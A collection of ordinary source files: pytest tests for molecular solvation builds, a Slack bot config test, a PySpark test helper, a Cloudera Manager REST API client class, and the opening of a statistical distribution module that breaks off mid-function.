grepped_waters = sp.check_output(
["grep -oh 'WAT' ./tmp/solvate.prmtop | wc -w"], shell=True
)
assert int(grepped_waters) == waters
@pytest.mark.parametrize("shape", ["octahedral", "cubic"])
def test_solvation_shapes(shape, clean_files):
""" Test that we can solvate CB6-BUT with a truncated octahedron. """
waters = np.random.randint(1000, 10000)
log.debug("Trying {} waters in a truncated octahedron...".format(waters))
sys = System()
sys.template_file = os.path.join(
os.path.dirname(__file__), "../data/cb6-but/tleap_solvate.in"
)
sys.output_path = "tmp"
sys.loadpdb_file = os.path.join(
os.path.dirname(__file__), "../data/cb6-but/cb6-but.pdb"
)
sys.target_waters = waters
sys.output_prefix = "solvate"
sys.pbc_type = shape
sys.build()
grepped_waters = sp.check_output(
["grep -oh 'WAT' ./tmp/solvate.prmtop | wc -w"], shell=True
)
assert int(grepped_waters) == waters
@pytest.mark.slow
def test_solvation_spatial_size(clean_files):
""" Test that we can solvate CB6-BUT with an buffer size in Angstroms. """
random_int = np.random.randint(10, 20)
random_size = random_int * np.random.random_sample(1) + random_int
log.debug("Trying buffer size of {} A...".format(random_size[0]))
sys = System()
sys.template_file = os.path.join(
os.path.dirname(__file__), "../data/cb6-but/tleap_solvate.in"
)
sys.output_path = "tmp"
sys.loadpdb_file = os.path.join(
os.path.dirname(__file__), "../data/cb6-but/cb6-but.pdb"
)
sys.buffer_value = float(random_size[0])
sys.output_prefix = "solvate"
sys.pbc_type = "cubic"
sys.build()
grepped_waters = sp.check_output(
["grep -oh 'WAT' ./tmp/solvate.prmtop | wc -w"], shell=True
)
assert int(grepped_waters) == sys.target_waters
@pytest.mark.slow
def test_solvation_potassium_control(clean_files):
""" Test there is no potassium by default. A negative control. """
waters = np.random.randint(1000, 10000)
log.debug("Trying {} waters with potassium...".format(waters))
sys = System()
sys.template_file = os.path.join(
os.path.dirname(__file__), "../data/cb6-but/tleap_solvate.in"
)
sys.output_path = "tmp"
sys.loadpdb_file = os.path.join(
os.path.dirname(__file__), "../data/cb6-but/cb6-but.pdb"
)
sys.target_waters = waters
sys.output_prefix = "solvate"
sys.counter_cation = "K+"
sys.build()
potassium = sp.check_output(
["grep -oh 'K+' ./tmp/solvate.prmtop | wc -w"], shell=True
)
assert int(potassium) == 0
@pytest.mark.slow
def test_solvation_with_additional_ions(clean_files):
""" Test that we can solvate CB6-BUT with additional ions. """
waters = np.random.randint(1000, 10000)
cations = ["LI", "Na+", "K+", "RB", "CS"]
anions = ["F", "Cl-", "BR", "IOD"]
n_cations = np.random.randint(1, 10)
n_anions = np.random.randint(1, 10)
random_cation = random.choice(cations)
random_anion = random.choice(anions)
log.debug("Trying {} waters with additional ions...".format(waters))
sys = System()
sys.template_file = os.path.join(
os.path.dirname(__file__), "../data/cb6-but/tleap_solvate.in"
)
sys.output_path = "tmp"
sys.loadpdb_file = os.path.join(
os.path.dirname(__file__), "../data/cb6-but/cb6-but.pdb"
)
sys.target_waters = waters
sys.output_prefix = "solvate"
sys.neutralize = False
sys.add_ions = [random_cation, n_cations, random_anion, n_anions]
sys.build()
# These should come in the RESIDUE_LABEL region of the prmtop and be before all the water.
cation_number = sp.check_output(
[
"grep -A 99 RESIDUE_LABEL ./tmp/solvate.prmtop | "
+ "grep -oh '{} ' | wc -w".format(random_cation)
],
shell=True,
)
anion_number = sp.check_output(
[
"grep -A 99 RESIDUE_LABEL ./tmp/solvate.prmtop | "
+ "grep -oh '{} ' | wc -w".format(random_anion)
],
shell=True,
)
log.debug("Expecting...")
log.debug("cation = {}\tn_cations={}".format(random_cation, n_cations))
log.debug("anion = {}\t n_anions={}".format(random_anion, n_anions))
log.debug("Found...")
log.debug(" n_cations={}".format(cation_number))
log.debug(" n_anions={}".format(anion_number))
assert int(cation_number) == n_cations and int(anion_number) == n_anions
def test_solvation_by_M_and_m(clean_files):
""" Test that we can solvate CB6-BUT through molarity and molality. """
log.debug("Trying 10 A buffer with 150 mM NaCl...")
sys = System()
sys.template_file = os.path.join(
os.path.dirname(__file__), "../data/cb6-but/tleap_solvate.in"
)
sys.output_path = "tmp"
sys.loadpdb_file = os.path.join(
os.path.dirname(__file__), "../data/cb6-but/cb6-but.pdb"
)
sys.buffer_value = 10.0
sys.output_prefix = "solvate"
sys.neutralize = False
sys.pbc_type = "rectangular"
sys.add_ions = ["NA", "0.150M", "CL", "0.150M", "K", "0.100m", "BR", "0.100m"]
sys.build()
# Molarity Check
obs_num_na = sp.check_output(
["grep -A 99 RESIDUE_LABEL ./tmp/solvate.prmtop | " + "grep -oh 'NA ' | wc -w"],
shell=True,
)
obs_num_cl = sp.check_output(
["grep -A 99 RESIDUE_LABEL ./tmp/solvate.prmtop | " + "grep -oh 'CL ' | wc -w"],
shell=True,
)
volume = sys.get_volume()
volume_in_liters = volume * ANGSTROM_CUBED_TO_LITERS
calc_num_na = np.ceil((6.022 * 10 ** 23) * (0.150) * volume_in_liters)
calc_num_cl = np.ceil((6.022 * 10 ** 23) * (0.150) * volume_in_liters)
assert int(obs_num_na) == int(calc_num_na)
assert int(obs_num_cl) == int(calc_num_cl)
# Molality Check
obs_num_k = sp.check_output(
["grep -A 99 RESIDUE_LABEL ./tmp/solvate.prmtop | " + "grep -oh 'K ' | wc -w"],
shell=True,
)
obs_num_br = sp.check_output(
["grep -A 99 RESIDUE_LABEL ./tmp/solvate.prmtop | " + "grep -oh 'BR ' | wc -w"],
shell=True,
)
calc_num_waters = sys.count_residues()["WAT"]
calc_num_k = np.ceil(0.100 * calc_num_waters * 0.018)
calc_num_br = np.ceil(0.100 * calc_num_waters * 0.018)
assert int(obs_num_k) == int(calc_num_k)
assert int(obs_num_br) == int(calc_num_br)
@pytest.mark.slow
def test_alignment_workflow(clean_files):
""" Test that we can solvate CB6-BUT after alignment. """
cb6 = pmd.load_file(
os.path.join(
os.path.dirname(__file__), "../data/cb6-but/cb6-but-notcentered.pdb"
)
)
zalign(cb6, ":CB6", ":BUT", save=True, filename="./tmp/tmp.pdb")
waters = np.random.randint(1000, 10000)
sys = System()
sys.template_file = os.path.join(
os.path.dirname(__file__), "../data/cb6-but/tleap_solvate.in"
)
sys.output_path = "tmp"
sys.loadpdb_file = "tmp.pdb"
sys.target_waters = waters
sys.output_prefix = "solvate"
sys.build()
log.debug("Trying {} waters after alignment...".format(waters))
grepped_waters = sp.check_output(
["grep -oh 'WAT' ./tmp/solvate.prmtop | wc -w"], shell=True
)
assert int(grepped_waters) == waters
def test_add_dummy(clean_files):
""" Test that dummy atoms get added correctly """
temporary_directory = os.path.join(os.path.dirname(__file__), "tmp")
host_guest = pmd.load_file(
os.path.join(
os.path.dirname(__file__), "../data/cb6-but/cb6-but-notcentered.pdb"
),
structure=True,
)
host_guest = zalign(host_guest, ":BUT@C", ":BUT@C3", save=False)
host_guest = add_dummy(host_guest, residue_name="DM1", z=-11.000, y=2.000, x=-1.500)
host_guest.write_pdb(
os.path.join(temporary_directory, "cb6-but-dum.pdb"), renumber=False
)
with open(os.path.join(temporary_directory, "cb6-but-dum.pdb"), "r") as f:
lines = f.readlines()
test_line1 = lines[123].rstrip()
test_line2 = lines[124].rstrip()
ref_line1 = "TER 123 BUT 2"
ref_line2 = (
"HETATM 123 DUM DM1 3 -1.500 2.000 -11.000 0.00 0.00 PB"
)
assert ref_line1 == test_line1
assert ref_line2 == test_line2
write_dummy_frcmod(path=temporary_directory)
write_dummy_mol2(path=temporary_directory, filename="dm1.mol2", residue_name="DM1")
sys = System()
cb6_frcmod = os.path.abspath(
os.path.join(os.path.dirname(__file__), "../data/cb6-but/cb6.frcmod")
)
cb6_mol2 = os.path.abspath(
os.path.join(os.path.dirname(__file__), "../data/cb6-but/cb6.mol2")
)
but_frcmod = os.path.abspath(
os.path.join(os.path.dirname(__file__), "../data/cb6-but/but.frcmod")
)
but_mol2 = os.path.abspath(
os.path.join(os.path.dirname(__file__), "../data/cb6-but/but.mol2")
)
sys.template_lines = [
"source leaprc.gaff",
f"loadamberparams {cb6_frcmod}",
f"CB6 = loadmol2 {cb6_mol2}",
f"loadamberparams {but_frcmod}",
f"BUT = loadmol2 {but_mol2}",
"loadamberparams dummy.frcmod",
"DM1 = loadmol2 dm1.mol2",
"model = loadpdb cb6-but-dum.pdb",
]
sys.output_path = temporary_directory
sys.output_prefix = "cb6-but-dum"
sys.pbc_type = None
sys.neutralize = False
sys.build()
with open(
os.path.join(os.path.dirname(__file__), "../data/cb6-but/REF_cb6-but-dum.rst7"),
"r",
) as f:
contents = f.read()
reference = [float(i) for i in contents.split()[2:]]
with open(os.path.join(temporary_directory, "cb6-but-dum.rst7"), "r") as f:
contents = f.read()
new = [float(i) for i in contents.split()[2:]]
assert np.allclose(reference, new)
def test_hydrogen_mass_repartitioning(clean_files):
""" Test that hydrogen mass is repartitioned. """
temporary_directory = os.path.join(os.path.dirname(__file__), "tmp")
sys = System()
but_frcmod = os.path.abspath(
os.path.join(os.path.dirname(__file__), "../data/cb6-but/but.frcmod")
)
but_mol2 = os.path.abspath(
os.path.join(os.path.dirname(__file__), "../data/cb6-but/but.mol2")
)
sys.template_lines = [
"source leaprc.gaff",
f"loadamberparams {but_frcmod}",
f"BUT = loadmol2 {but_mol2}",
f"model = loadmol2 {but_mol2}",
]
sys.output_path = temporary_directory
sys.output_prefix = "but"
sys.pbc_type = None
sys.neutralize = False
sys.build()
but = pmd.load_file(os.path.join(temporary_directory, sys.output_prefix + ".prmtop"))
assert np.allclose(but["@H="].atoms[0].mass, 1.008)
sys.repartition_hydrogen_mass()
but = pmd.load_file(os.path.join(temporary_directory, sys.output_prefix + ".prmtop"))
assert np.allclose(but["@H="].atoms[0].mass, 3.024)
```
|
{
"source": "jeff2d2/wtf-bot",
"score": 2
}
|
#### File: jeff2d2/wtf-bot/test_config.py
```python
import os
import pytest
from config import Config
@pytest.fixture(autouse=True)
def preserve_env_vars():
orig_data_url = os.getenv('DATA_URL')
orig_slack_tokens = os.getenv('SLACK_TOKENS')
yield
os.environ['DATA_URL'] = orig_data_url
os.environ['SLACK_TOKENS'] = orig_slack_tokens
@pytest.mark.parametrize("setting", ['DATA_URL', 'SLACK_TOKENS'])
def test_raises_exception_on_missing_setting(setting):
del os.environ[setting]
with pytest.raises(ValueError) as e:
assert Config().__getattribute__(setting)
assert str(e.value) == f'No {setting} environment variable set'
def test_handles_multiple_tokens_comma_separated():
os.environ['SLACK_TOKENS'] = 'token1,token2,token3'
assert Config().SLACK_TOKENS == ['token1', 'token2', 'token3']
```
|
{
"source": "jeff303/mse",
"score": 3
}
|
#### File: python/testing/TestUtils.py
```python
from pyspark.sql import *
from pyspark.sql.types import *
from pyspark.sql.functions import *
import unittest
def check_answer(result: DataFrame, expected_value: list, expected_schema: StructType):
tc = unittest.TestCase('__init__')
tc.assertEqual(result.collect(), expected_value)
tc.assertEqual(result.schema, expected_schema)
def updated(self: StructType, idx: int, element: StructField):
fields_list = self.fields.copy()
fields_list[idx] = element
return StructType(fields_list)
StructType.updated = updated
```
|
{
"source": "jeff303/topology_cdh",
"score": 2
}
|
#### File: jeff303/topology_cdh/cm_api.py
```python
import json
import logging
import requests
from clusterdock.utils import join_url_parts
DEFAULT_CM_USERNAME = 'admin' #:
DEFAULT_CM_PASSWORD = '<PASSWORD>' #:
REQUIRED_HEADERS = {'Content-Type': 'application/json'}
logger = logging.getLogger('clusterdock.{}'.format(__name__))
class ApiClient:
"""API client to communicate with a Cloudera Manager instance.
Args:
server_url (:obj:`str`): Cloudera Manager server URL (including port).
username (:obj:`str`, optional): Cloudera Manager username. Default:
:py:const:`DEFAULT_CM_USERNAME`
password (:obj:`str`, optional): Cloudera Manager password. Default:
:py:const:`DEFAULT_CM_PASSWORD`
"""
def __init__(self,
server_url,
username=DEFAULT_CM_USERNAME,
password=<PASSWORD>_CM_PASSWORD):
self.server_url = server_url
self.session = requests.Session()
self.session.auth = (username, password)
self.session.headers.update(REQUIRED_HEADERS)
self.api_version = self._get_api_version()
def get_all_hosts(self, view='summary'):
"""Get information about all the hosts in the deployment.
Args:
view (:obj:`str`, optional): The collection view. Could be ``summary`` or ``full``.
Default: ``summary``
Returns:
A dictionary (host ref list) of the hosts in the deployment.
"""
return self._get(endpoint='{}/hosts'.format(self.api_version),
params=dict(view=view)).json()
def get_cluster_parcels(self, cluster_name, view='summary'):
"""Get a list of all parcels to which a cluster has access.
Args:
cluster_name (:obj:`str`): The name of the cluster.
view (:obj:`str`, optional): The collection view. Could be ``summary`` or ``full``.
Default: ``summary``
Returns:
A dictionary (parcel list) of the parcels to which a cluster has access.
"""
return self._get(endpoint='{}/clusters/{}/parcels'.format(self.api_version,
cluster_name),
params={'view': view}).json()
def get_cluster_parcel_usage(self, cluster_name):
"""Get detailed parcel usage for a cluster.
Args:
cluster_name (:obj:`str`): The name of the cluster.
Returns:
A dictionary (parcel usage) of the parcels in use on the cluster.
"""
return self._get(endpoint='{}/clusters/{}/parcels/usage'.format(self.api_version,
cluster_name)).json()
def refresh_parcel_repos(self):
"""Refresh parcel information.
Returns:
A dictionary (command) of the submitted command.
"""
return self._post(endpoint=('{}/cm/commands/'
'refreshParcelRepos').format(self.api_version)).json()
def activate_cluster_parcel(self, cluster_name, product, version):
"""Activate a parcel on the cluster.
Args:
cluster_name (:obj:`str`): The name of the cluster.
product (:obj:`str`): The product to deactivate.
version (:obj:`str`): The version to deactivate.
Returns:
A dictionary (command) of the submitted command.
"""
return self._post(endpoint=('{}/clusters/{}/parcels/products/{}/'
'versions/{}/commands/activate').format(self.api_version,
cluster_name,
product,
version)).json()
def deactivate_cluster_parcel(self, cluster_name, product, version):
"""Deactivate a parcel on the cluster.
Args:
cluster_name (:obj:`str`): The name of the cluster.
product (:obj:`str`): The product to deactivate.
version (:obj:`str`): The version to deactivate.
Returns:
A dictionary (command) of the submitted command.
"""
return self._post(endpoint=('{}/clusters/{}/parcels/products/{}/'
'versions/{}/commands/deactivate').format(self.api_version,
cluster_name,
product,
version)).json()
def distribute_cluster_parcel(self, cluster_name, product, version):
"""Distribute parcel on the cluster.
Args:
cluster_name (:obj:`str`): The name of the cluster.
product (:obj:`str`): The product to deactivate.
version (:obj:`str`): The version to deactivate.
Returns:
A dictionary (command) of the submitted command.
"""
return self._post(endpoint=('{}/clusters/{}/parcels/products/{}/'
'versions/{}/commands/'
'startDistribution').format(self.api_version,
cluster_name,
product,
version)).json()
def download_cluster_parcel(self, cluster_name, product, version):
"""Download parcel on the cluster.
Args:
cluster_name (:obj:`str`): The name of the cluster.
product (:obj:`str`): The product to deactivate.
version (:obj:`str`): The version to deactivate.
Returns:
A dictionary (command) of the submitted command.
"""
return self._post(endpoint=('{}/clusters/{}/parcels/products/{}/'
'versions/{}/commands/startDownload').format(self.api_version,
cluster_name,
product,
version)).json()
def remove_distributed_cluster_parcel(self, cluster_name, product, version):
"""Remove distributed parcel on the cluster.
Args:
cluster_name (:obj:`str`): The name of the cluster.
product (:obj:`str`): The product to deactivate.
version (:obj:`str`): The version to deactivate.
Returns:
A dictionary (command) of the submitted command.
"""
return self._post(endpoint=('{}/clusters/{}/parcels/products/{}/'
'versions/{}/commands/'
'startRemovalOfDistribution').format(self.api_version,
cluster_name,
product,
version)).json()
def remove_downloaded_cluster_parcel(self, cluster_name, product, version):
"""Remove downloaded parcel on the cluster.
Args:
cluster_name (:obj:`str`): The name of the cluster.
product (:obj:`str`): The product to deactivate.
version (:obj:`str`): The version to deactivate.
Returns:
A dictionary (command) of the submitted command.
"""
return self._post(endpoint=('{}/clusters/{}/parcels/products/{}/'
'versions/{}/commands/removeDownload').format(self.api_version,
cluster_name,
product,
version)).json()
def get_host(self, host_id):
"""Get information about a specific host in the deployment.
Args:
host_id (:obj:`str`): The host ID of the host.
Returns:
A dictionary of information about the host.
"""
return self._get(endpoint='{}/hosts/{}'.format(self.api_version,
host_id)).json()
def get_cluster_hosts(self, cluster_name):
"""Get information about the hosts associated with the cluster.
Args:
cluster_name (:obj:`str`): The name of the cluster.
Returns:
A dictionary (host ref list) of the hosts associated with the cluster.
"""
return self._get(endpoint='{}/clusters/{}/hosts'.format(self.api_version,
cluster_name)).json()
def add_cluster_hosts(self, cluster_name, host_ref_list):
"""Add hosts to the cluster.
Args:
cluster_name (:obj:`str`): The name of the cluster.
host_ref_list (:obj:`dict`)
Returns:
A dictionary (host ref list) of the hosts added to the cluster.
"""
return self._post(endpoint='{}/clusters/{}/hosts'.format(self.api_version,
cluster_name),
data=host_ref_list).json()
def create_cluster_services(self, cluster_name, service_list):
"""Create a list of services.
Args:
cluster_name (:obj:`str`): The name of the cluster.
service_list (:obj:`dict`)
Returns:
A dictionary (service list) of the created services.
"""
return self._post(endpoint='{}/clusters/{}/services'.format(self.api_version,
cluster_name),
data=service_list).json()
def get_cluster_services(self, cluster_name, view='summary'):
"""Get a list of all services in the cluster.
Args:
cluster_name (:obj:`str`): The name of the cluster.
view (:obj:`str`, optional): The collection view. Could be ``summary`` or ``full``.
Default: ``summary``
Returns:
A dictionary (service list) of all services in the cluster.
"""
return self._get(endpoint='{}/clusters/{}/services'.format(self.api_version,
cluster_name),
params={'view': view}).json()
def delete_cluster_service(self, cluster_name, service_name):
"""Deletes a service from the cluster.
Args:
cluster_name (:obj:`str`): The name of the cluster.
service_name (:obj:`str`): The name of the service.
Returns:
A dictionary (service) of details of the deleted service.
"""
return self._delete(endpoint='{}/clusters/{}/services/{}'.format(self.api_version,
cluster_name,
service_name)).json()
def get_service_roles(self, cluster_name, service_name):
"""Get a list of roles of a given service.
Args:
cluster_name (:obj:`str`): The name of the cluster.
service_name (:obj:`str`): The name of the service.
Returns:
A dictionary (role list) of the roles of the service.
"""
return self._get(endpoint='{}/clusters/{}/services/{}/roles'.format(self.api_version,
cluster_name,
service_name)).json()
def get_service_role_config_groups(self, cluster_name, service_name):
"""Get a list of role config groups of a given service.
Args:
cluster_name (:obj:`str`): The name of the cluster.
service_name (:obj:`str`): The name of the service.
Returns:
A dictionary (role config group list) of the role config groups of the service.
"""
return self._get(endpoint=('{}/clusters/{}/services/{}/'
'roleConfigGroups').format(self.api_version,
cluster_name,
service_name)).json()
def get_service_role_config_group_config(self, cluster_name, service_name,
role_config_group_name, view='summary'):
"""Get the service role config group configuration.
Args:
cluster_name (:obj:`str`): The name of the cluster.
service_name (:obj:`str`): The name of the service.
role_config_group_name (:obj:`str`): The name of the role config group.
view (:obj:`str`, optional): The collection view. Could be ``summary`` or ``full``.
Default: ``summary``
Returns:
A dictionary (config list) of the current service role config group configuration.
"""
return self._get(endpoint=('{}/clusters/{}/services/{}/'
'roleConfigGroups/{}/config').format(self.api_version,
cluster_name,
service_name,
role_config_group_name),
params={'view': view}).json()
def update_service_role_config_group_config(self, cluster_name, service_name,
role_config_group_name, config_list):
"""Update the service role config group configuration values.
Args:
cluster_name (:obj:`str`): The name of the cluster.
service_name (:obj:`str`): The name of the service.
role_config_group_name (:obj:`str`): The name of the role config group.
config_list (:obj:`dict`)
Returns:
A dictionary (config list) of the updated service role config group configuration.
"""
return self._put(endpoint=('{}/clusters/{}/services/{}/'
'roleConfigGroups/{}/config').format(self.api_version,
cluster_name,
service_name,
role_config_group_name),
data=config_list).json()
def update_service_config(self, cluster_name, service_name, service_config):
"""Update the service configuration values.
Args:
cluster_name (:obj:`str`): The name of the cluster.
service_name (:obj:`str`): The name of the service.
service_config (:obj:`dict`)
Returns:
A dictionary (service config) of the new service configuration.
"""
return self._put(endpoint='{}/clusters/{}/services/{}/config'.format(self.api_version,
cluster_name,
service_name),
data=service_config).json()
def deploy_cluster_kerberos_client_config(self, cluster_name, host_ref_list):
"""Deploy cluster Kerberos client config.
Args:
cluster_name (:obj:`str`): The name of the cluster.
host_ref_list (:obj:`dict`)
Returns:
A dictionary (command) of the submitted command.
"""
return self._post(endpoint=('{}/clusters/{}/commands/'
'deployClusterClientConfig').format(self.api_version,
cluster_name),
data=host_ref_list).json()
def first_run_cluster_service(self, cluster_name, service_name):
"""Run firstRun on a service from the cluster. This command prepares and starts the service.
Args:
cluster_name (:obj:`str`): The name of the cluster.
service_name (:obj:`str`): The name of the service.
Returns:
A dictionary (command) of the submitted command.
"""
return self._post(endpoint=('{}/clusters/{}/services/{}/'
'commands/firstRun').format(self.api_version,
cluster_name,
service_name)).json()
def restart_cluster_service(self, cluster_name, service_name):
"""Restart a cluster service.
Args:
cluster_name (:obj:`str`): The name of the cluster.
service_name (:obj:`str`): The name of the service.
Returns:
A dictionary (command) of the submitted command.
"""
return self._post(endpoint=('{}/clusters/{}/services/{}/'
'commands/restart').format(self.api_version,
cluster_name,
service_name)).json()
def start_cluster_service(self, cluster_name, service_name):
"""Start a cluster service.
Args:
cluster_name (:obj:`str`): The name of the cluster.
service_name (:obj:`str`): The name of the service.
Returns:
A dictionary (command) of the submitted command.
"""
return self._post(endpoint=('{}/clusters/{}/services/{}/'
'commands/start').format(self.api_version,
cluster_name,
service_name)).json()
def stop_cluster_service(self, cluster_name, service_name):
"""Stop a cluster service.
Args:
cluster_name (:obj:`str`): The name of the cluster.
service_name (:obj:`str`): The name of the service.
Returns:
A dictionary (command) of the submitted command.
"""
return self._post(endpoint=('{}/clusters/{}/services/{}/'
'commands/stop').format(self.api_version,
cluster_name,
service_name)).json()
def update_all_hosts_config(self, config_list):
"""Update the default configuration values for all hosts.
Args:
config_list (:obj:`dict`)
Returns:
A dictionary (config list) of updated config values.
"""
return self._put(endpoint='{}/cm/allHosts/config'.format(self.api_version),
data=config_list).json()
def update_hive_metastore_namenodes(self, cluster_name, service_name):
"""Update the Hive Metastore to point to a NameNode's Nameservice.
Args:
cluster_name (:obj:`str`): The name of the cluster.
service_name (:obj:`str`): The name of the Hive service.
Returns:
A dictionary (command) of the submitted command.
"""
return self._post(endpoint=('{}/clusters/{}/services/{}/commands/'
'hiveUpdateMetastoreNamenodes').format(self.api_version,
cluster_name,
service_name)).json()
def format_hdfs_namenodes(self, cluster_name, service_name):
"""Format HDFS NameNodes.
Args:
cluster_name (:obj:`str`): The name of the cluster.
service_name (:obj:`str`): The name of the HDFS service.
Returns:
A dictionary (command) of the submitted command.
"""
role_name = [role['name'] for role in self.get_service_roles(cluster_name, service_name)['items']
if role['type'] == 'NAMENODE']
role_name_list = {'items': role_name}
return self._post(endpoint=('{}/clusters/{}/services/{}/roleCommands/'
'hdfsFormat').format(self.api_version,
cluster_name,
service_name),
data=role_name_list).json()
def get_cm_config(self, view='summary'):
"""Get CM configuration values.
Args:
view (:obj:`str`, optional): The collection view. Could be ``summary`` or ``full``.
Default: ``summary``
Returns:
A dictionary (config list) of updated config values.
"""
return self._get(endpoint='{}/cm/config'.format(self.api_version),
params=dict(view=view)).json()
def update_cm_config(self, config_list):
"""Update CM configuration values.
Args:
config_list (:obj:`dict`)
Returns:
An dictionary (config list) of updated config values.
"""
return self._put(endpoint='{}/cm/config'.format(self.api_version),
data=config_list).json()
def import_admin_credentials(self, username, password):
"""Import KDC admin credentials that CM needs to create Kerberos principals.
Args:
username (:obj:`str`): CM principal username.
password (:obj:`str`): CM principal password.
Returns:
A dictionary (command) of the submitted command.
"""
return self._post(endpoint='{}/cm/commands/importAdminCredentials'.format(self.api_version),
params=dict(username=username, password=password)).json()
def create_host_templates(self, cluster_name, host_template_list):
"""Create new host templates.
Args:
cluster_name (:obj:`str`): The name of the cluster.
host_template_list (:obj:`dict`)
Returns:
A dictionary (host template list) of the created host templates.
"""
return self._post(endpoint='{}/clusters/{}/hostTemplates'.format(self.api_version,
cluster_name),
data=host_template_list).json()
def apply_host_template(self, cluster_name, host_template_name, start_roles, host_ref_list):
"""Apply a host template to a collection of hosts.
Args:
cluster_name (:obj:`str`): The name of the cluster.
host_template_name (:obj:`str`): The name of the host template.
start_roles (:obj:`bool`): Start the newly-created roles.
host_ref_list (:obj:`dict`)
Returns:
A dictionary (command) of the submitted command.
"""
return self._post(endpoint=('{}/clusters/{}/hostTemplates/{}/'
'commands/applyHostTemplate').format(self.api_version,
cluster_name,
host_template_name),
params={'startRoles': start_roles},
data=host_ref_list).json()
def deploy_cluster_client_config(self, cluster_name):
"""Deploy the cluster-wide client configuration.
Args:
cluster_name (:obj:`str`): The name of the cluster.
Returns:
A dictionary (command) of the submitted command.
"""
return self._post(endpoint=('{}/clusters/{}/commands/'
'deployClientConfig').format(self.api_version,
cluster_name)).json()
def configure_cluster_for_kerberos(self, cluster_name):
"""Configure the cluster to use Kerberos.
Args:
cluster_name (:obj:`str`): The name of the cluster.
Returns:
A dictionary (command) of the submitted command.
"""
return self._post(endpoint=('{}/clusters/{}/commands/'
'configureForKerberos').format(self.api_version,
cluster_name),
data={}).json()
def get_cm_kerberos_principals(self):
"""Get list of Kerberos principals needed by the services being managed by Cloudera Manager.
Returns:
A dictionary (principal) of Kerberos principals needed by the services being managed by Cloudera Manager.
"""
return self._get(endpoint='{}/cm/kerberosPrincipals'.format(self.api_version)).json()
def start_all_cluster_services(self, cluster_name):
"""Start all cluster services in the cluster.
Args:
cluster_name (:obj:`str`): The name of the cluster.
Returns:
A dictionary (command) of the submitted command.
"""
return self._post(endpoint='{}/clusters/{}/commands/start'.format(self.api_version,
cluster_name)).json()
def stop_all_cluster_services(self, cluster_name):
"""Stop all cluster services in the cluster.
Args:
cluster_name (:obj:`str`): The name of the cluster.
Returns:
A dictionary (command) of the submitted command.
"""
return self._post(endpoint='{}/clusters/{}/commands/stop'.format(self.api_version,
cluster_name)).json()
def get_cm_service(self, view='summary'):
"""Get Cloudera Manager Services service.
Args:
view (:obj:`str`, optional): The collection view. Could be ``summary`` or ``full``.
Default: ``summary``
Returns:
A dictionary (service) of the Cloudera Manager Services service.
"""
return self._get(endpoint='{}/cm/service'.format(self.api_version),
params=dict(view=view)).json()
def start_cm_service(self):
"""Start the Cloudera Manager Services.
Returns:
A dictionary (command) of the submitted command.
"""
return self._post(endpoint='{}/cm/service/commands/start'.format(self.api_version)).json()
def begin_trial(self):
"""Begin the trial license for this Cloudera Manager instance.
This allows the user to have enterprise-level features for a 60-day trial period.
"""
self._post(endpoint='{}/cm/trial/begin'.format(self.api_version))
def create_cm_roles(self, role_list):
"""Create Cloudera Manager roles.
Args:
role_list (:obj:`list`)
Returns:
A list (role list) of the created Cloudera Manager roles.
"""
return self._post(endpoint='{}/cm/service/roles'.format(self.api_version),
data=role_list).json()
def update_cm_service_role_config_group_config(self, role_config_group_name, config_list):
"""Update the configuration values for Cloudera Manager service role config group.
Args:
role_config_group_name (:obj:`str`): The name of the role config group.
config_list (:obj:`dict`)
Returns:
A dictionary (config list) of the updated service role config group configuration.
"""
return self._put(endpoint=('{}/cm/service/roleConfigGroups/{}/config').format(self.api_version,
role_config_group_name),
data=config_list).json()
def get_command_information(self, command_id):
"""Get detailed information on an asynchronous command.
Args:
command_id (:obj:`str`): The command ID.
Returns:
A dictionary (command) of the submitted command.
"""
return self._get(endpoint='{}/commands/{}'.format(self.api_version,
command_id)).json()
def inspect_hosts(self, cluster_name):
"""Inspect hosts in the cluster.
Args:
cluster_name (:obj:`str`): The name of the cluster.
Returns:
A dictionary (command) of the submitted command.
"""
return self._post(endpoint='{}/clusters/{}/commands/inspectHosts'.format(self.api_version,
cluster_name)).json()
def list_all_clusters(self):
"""List clusters.
Returns:
A list of the clusters.
"""
return self._get(endpoint='{}/clusters'.format(self.api_version)).json()
def download_command_output(self, command_id):
"""Return the output of download of the command.
Args:
command_id (:obj:`str`): The command ID.
Returns:
Contents of the download.
"""
return self._get(endpoint='/command/{}/download'.format(command_id), endpoint_suffix='/cmf').json()
def _get_api_version(self):
api_version = self._get(endpoint='/version').text
if not api_version.startswith('v'):
raise Exception('/api/version returned unexpected result ({}).'.format(api_version))
else:
logger.info('Detected CM API %s.', api_version)
return api_version
def _get(self, endpoint, endpoint_suffix='/api', params=None):
url = join_url_parts(self.server_url, endpoint_suffix, endpoint)
logger.debug('Sending GET request to URL (%s) with parameters (%s) ...',
url,
params or 'None')
response = self.session.get(url, params=params or {})
if response.status_code != requests.codes.ok:
logger.error(response.text)
response.raise_for_status()
return response
def _post(self, endpoint, params=None, data=None):
url = join_url_parts(self.server_url, '/api', endpoint)
data = json.dumps(data)
logger.debug('Sending POST request to URL (%s) with parameters (%s) and data (%s) ...',
url,
params or 'None',
data or 'None')
response = self.session.post(url, params=params or {}, data=data)
if response.status_code != requests.codes.ok:
logger.error(response.text)
response.raise_for_status()
return response
def _delete(self, endpoint, params=None, data=None):
url = join_url_parts(self.server_url, '/api', endpoint)
data = json.dumps(data)
logger.debug('Sending POST request to URL (%s) with parameters (%s) and data (%s) ...',
url,
params or 'None',
data or 'None')
response = self.session.delete(url, params=params or {}, data=data)
if response.status_code != requests.codes.ok:
logger.error(response.text)
response.raise_for_status()
return response
def _put(self, endpoint, params=None, data=None):
url = join_url_parts(self.server_url, '/api', endpoint)
data = json.dumps(data)
logger.debug('Sending PUT request to URL (%s) with parameters (%s) and data (%s) ...',
url,
params or 'None',
data or 'None')
response = self.session.put(url, params=params or {}, data=data)
if response.status_code != requests.codes.ok:
logger.error(response.text)
response.raise_for_status()
return response
```
|
{
"source": "jeff324/pyDE",
"score": 2
}
|
#### File: pyDE/pyDE/distributions.py
```python
import numpy as np
from scipy.stats import norm
from scipy.stats import uniform
from scipy.stats import truncnorm
def lba_logpdf(rt, response, b, A, v, s, t0):
def fptpdf(z,x0max,chi,driftrate,sddrift):
if x0max<1e-10:
out = (chi/np.power(z,2)) * norm.pdf(chi/z,loc=driftrate,scale=sddrift)
return out
zs = z*sddrift
zu = z*driftrate
chiminuszu = chi-zu
chizu = chiminuszu/zs
chizumax = (chiminuszu-x0max)/zs
out = (driftrate*(norm.cdf(chizu)-norm.cdf(chizumax)) + sddrift*(norm.pdf(chizumax)-norm.pdf(chizu)))/x0max
return out
